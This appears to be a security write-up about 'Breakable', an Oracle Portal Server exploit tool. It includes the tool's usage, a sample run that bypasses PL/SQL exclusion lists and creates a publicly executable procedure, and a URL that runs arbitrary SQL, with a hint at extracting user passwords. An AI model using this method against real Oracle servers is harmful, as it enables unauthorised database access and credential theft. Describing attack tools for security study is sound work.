Breakable

This tool is basically a mini-exploit engine that specifically targets Oracle Portal Server and will successfully break into any release of Oracle including 10gR2 patched to CPU Jan 06.  Due to certain issues with Oracle patching it is also worth trying this tool on servers patched with more current CPU's just in case certain elements of the patch have not been applied or elements from future patches may have re-opened a previously secured vulnerability.  In essence the tool tries to create a procedure and then grant execute to public.  After this has been successfully carried out it ties to exploit security weaknesses in a number of in-built Oracle procedures.   I became aware of this tool after attending the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software. 

At the time of writing this tool has not been publicly released and is only available to those people who take specific training at specialist NGS Software events i.e. Black Hat

Execution:
 

C:\>breakable.exe host url [port] [v]
 

Options
host      ip_address of the Oracle Portal Server
url        PATH_INFO i.e. /pls/orasso
port      TCP port Oracle Portal Server is serving pages from
v          verbose

 

Example:

C:\breakable 192.168.0.17 /pls/orasso 7777
Checking NULL.........................[PASSED][200]
Checking NOPROC.......................[PASSED][404]
Checking DIRECT HTP ACCESS............[FAILED][403]
Checking DIRECT OWA_UTIL ACCESS.......[FAILED][403]
Checking DIRECT DRILOAD ACCESS........[FAILED][404]
Checking NEWLINE EXCLUSION BYPASS.....[FAILED][403]
Checking LABEL EXCLUSION BYPASS.......[FAILED][403]
Checking BACKSLASH EXCLUSION BYPASS...[FAILED][404]
Checking QUOTE EXCLUSION BYPASS.......[FAILED][404]
Checking PARAM 1 EXCLUSION BYPASS.....[FAILED][404]
Checking PARAM 2 EXCLUSION BYPASS.....[FAILED][404]
Checking PARAM 3 EXCLUSION BYPASS.....[PASSED][200]
Checking PARAM 4 EXCLUSION BYPASS.....[PASSED][200]
LEVEL: 8
Creating the procedure...[FAILED]
Server responded with 404; expected 200.
Creating the procedure...[PASSED][200]
Granting execute to public...[PASSED][200]
Creating public synonym...[PASSED][200]
Checking...[PASSED][200]

Now goto:

http://192.168.0.17/pls/orasso/breakable_z?STMT=SELECT%20'BREAKABLE'%20FROM%20DUAL

Traversing to this link now gives you the option to supply single SQL arguments that can be directly executed on the Oracle Portal Server:

Obviously the argument can be changed to also supply the passwords ;-)  The created procedure will also allow the use of concat statements to be able in this case to concatenate the passwords with the associated user account.  Updates to the tool will be done in-house at NGS Software.